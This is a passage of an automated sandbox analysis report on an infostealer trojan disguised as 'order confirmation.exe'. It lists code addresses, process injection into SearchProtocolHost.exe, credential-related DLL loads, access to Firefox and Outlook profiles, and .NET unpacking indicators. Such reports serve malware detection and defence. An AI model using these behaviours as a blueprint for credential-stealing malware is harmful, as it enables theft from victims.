                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035101009_2_03510100
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D81CC9_2_035D81CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035E01AA9_2_035E01AA
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D41A29_2_035D41A2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035B20009_2_035B2000
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035447509_2_03544750
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035207709_2_03520770
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0351C7C09_2_0351C7C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0353C6E09_2_0353C6E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035205359_2_03520535
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035E05919_2_035E0591
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D24469_2_035D2446
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035C44209_2_035C4420
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035CE4F69_2_035CE4F6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DAB409_2_035DAB40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D6BD79_2_035D6BD7
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0351EA809_2_0351EA80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035369629_2_03536962
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035229A09_2_035229A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035EA9A69_2_035EA9A6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035228409_2_03522840
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0352A8409_2_0352A840
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0354E8F09_2_0354E8F0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035068B89_2_035068B8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03594F409_2_03594F40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03540F309_2_03540F30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035C2F309_2_035C2F30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03562F289_2_03562F28
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03512FC89_2_03512FC8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0352CFE09_2_0352CFE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0359EFA09_2_0359EFA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03520E599_2_03520E59
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DEE269_2_035DEE26
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DEEDB9_2_035DEEDB
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03532E909_2_03532E90
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DCE939_2_035DCE93
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035BCD1F9_2_035BCD1F
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0352AD009_2_0352AD00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0351ADE09_2_0351ADE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03538DBF9_2_03538DBF
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03520C009_2_03520C00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03510CF29_2_03510CF2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035C0CB59_2_035C0CB5
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0350D34C9_2_0350D34C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D132D9_2_035D132D
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0356739A9_2_0356739A
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0353B2C09_2_0353B2C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035C12ED9_2_035C12ED
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035252A09_2_035252A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0350F1729_2_0350F172
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035EB16B9_2_035EB16B
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0355516C9_2_0355516C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0352B1B09_2_0352B1B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035CF0CC9_2_035CF0CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035270C09_2_035270C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D70E99_2_035D70E9
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DF0E09_2_035DF0E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DF7B09_2_035DF7B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035656309_2_03565630
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D16CC9_2_035D16CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D75719_2_035D7571
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035E95C39_2_035E95C3
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035BD5B09_2_035BD5B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035114609_2_03511460
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DF43F9_2_035DF43F
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DFB769_2_035DFB76
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03595BF09_2_03595BF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0355DBF99_2_0355DBF9
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0353FB809_2_0353FB80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DFA499_2_035DFA49
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D7A469_2_035D7A46
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03593A6C9_2_03593A6C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035CDAC69_2_035CDAC6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03565AA09_2_03565AA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035BDAAC9_2_035BDAAC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035C1AA39_2_035C1AA3
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035299509_2_03529950
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0353B9509_2_0353B950
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035B59109_2_035B5910
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0358D8009_2_0358D800
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035238E09_2_035238E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DFF099_2_035DFF09
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_034E3FD59_2_034E3FD5
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_034E3FD29_2_034E3FD2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03521F929_2_03521F92
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DFFB19_2_035DFFB1
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03529EB09_2_03529EB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D1D5A9_2_035D1D5A
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03523D409_2_03523D40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D7D739_2_035D7D73
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0353FDC09_2_0353FDC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03599C329_2_03599C32
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DFCF29_2_035DFCF2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009F20109_2_009F2010
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009ECF009_2_009ECF00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EB1169_2_009EB116
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EB1209_2_009EB120
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009ED1209_2_009ED120
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EB2709_2_009EB270
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EB2649_2_009EB264
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EB3389_2_009EB338
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009F56909_2_009F5690
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009F38909_2_009F3890
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_00A0BCD09_2_00A0BCD0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CE3589_2_033CE358
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CE4739_2_033CE473
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CCB359_2_033CCB35
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CCB789_2_033CCB78
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CE80E9_2_033CE80E
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CD8D89_2_033CD8D8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0358EA12 appears 86 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0350B970 appears 280 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 03567E54 appears 111 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 03555130 appears 58 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0359F290 appears 105 times
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: String function: 01407E54 appears 102 times
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: String function: 013F5130 appears 58 times
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: String function: 0142EA12 appears 86 times
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: String function: 0143F290 appears 105 times
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: String function: 013AB970 appears 280 times
                Source: order confirmation.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: order confirmation.exe, 00000000.00000002.1654846617.0000000001854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameaGAv.exe vs order confirmation.exe
                Source: order confirmation.exe, 00000000.00000002.1654846617.000000000179E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs order confirmation.exe
                Source: order confirmation.exe, 00000000.00000002.1661314025.0000000005EB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs order confirmation.exe
                Source: order confirmation.exe, 00000000.00000002.1669177106.0000000007E60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs order confirmation.exe
                Source: order confirmation.exe, 00000000.00000000.1564852727.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameaGAv.exe4 vs order confirmation.exe
                Source: order confirmation.exe, 00000000.00000002.1655731577.000000000358B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs order confirmation.exe
                Source: order confirmation.exe, 00000004.00000002.1983329477.00000000014AD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs order confirmation.exe
                Source: order confirmation.exeBinary or memory string: OriginalFilenameaGAv.exe4 vs order confirmation.exe
                Source: order confirmation.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: order confirmation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, wbVUabtqW87IewAOlm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, pdPLqmV7ftO3csrOSh.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, pdPLqmV7ftO3csrOSh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, pdPLqmV7ftO3csrOSh.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, wbVUabtqW87IewAOlm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, pdPLqmV7ftO3csrOSh.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, pdPLqmV7ftO3csrOSh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, pdPLqmV7ftO3csrOSh.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@7/5
                Source: C:\Users\user\Desktop\order confirmation.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\order confirmation.exe.logJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile created: C:\Users\user\AppData\Local\Temp\sE716IK71MJump to behavior
                Source: order confirmation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: order confirmation.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000003009000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.2183412812.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.2183412812.0000000003009000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: order confirmation.exeReversingLabs: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"
                Source: C:\Users\user\Desktop\order confirmation.exeProcess created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"
                Source: C:\Users\user\Desktop\order confirmation.exeProcess created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\order confirmation.exeProcess created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"Jump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"Jump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: tquery.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: order confirmation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: order confirmation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XDBtzWJieMe.exe, 00000008.00000002.2819410529.0000000000EBE000.00000002.00000001.01000000.0000000C.sdmp, XDBtzWJieMe.exe, 0000000A.00000002.2820406568.0000000000EBE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: order confirmation.exe, 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1991485419.000000000332E000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1983337784.0000000003179000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: order confirmation.exe, order confirmation.exe, 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1991485419.000000000332E000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1983337784.0000000003179000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdbUGP source: XDBtzWJieMe.exe, 00000008.00000003.1919507373.0000000000FFB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdb source: XDBtzWJieMe.exe, 00000008.00000003.1919507373.0000000000FFB000.00000004.00000001.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.order confirmation.exe.5eb0000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, pdPLqmV7ftO3csrOSh.cs.Net Code: ALd51SuoeM System.Reflection.Assembly.Load(byte[])
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, pdPLqmV7ftO3csrOSh.cs.Net Code: ALd51SuoeM System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_07D8A21A push eax; iretd 0_2_07D8A221
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00414B10 push edx; retf A241h4_2_00414B38
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00405057 push es; retf 4_2_00405075
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00416074 push eax; retf 4_2_0041609C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00412176 push edx; iretd 4_2_00412179
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0040AC7B push es; retf 4_2_0040AC88
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00403400 push eax; ret 4_2_00403402
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00411CE9 push esp; retf 4_2_00411C7E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00415FBD pushad ; retf 4_2_00415FBE
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B09AD push ecx; mov dword ptr [esp], ecx4_2_013B09B6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_034E225F pushad ; ret 9_2_034E27F9
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_034E27FA pushad ; ret 9_2_034E27F9
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035109AD push ecx; mov dword ptr [esp], ecx9_2_035109B6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_034E283D push eax; iretd 9_2_034E2858
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_034E135E push eax; iretd 9_2_034E1369
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EE52B push ebp; retf 9_2_009EE533
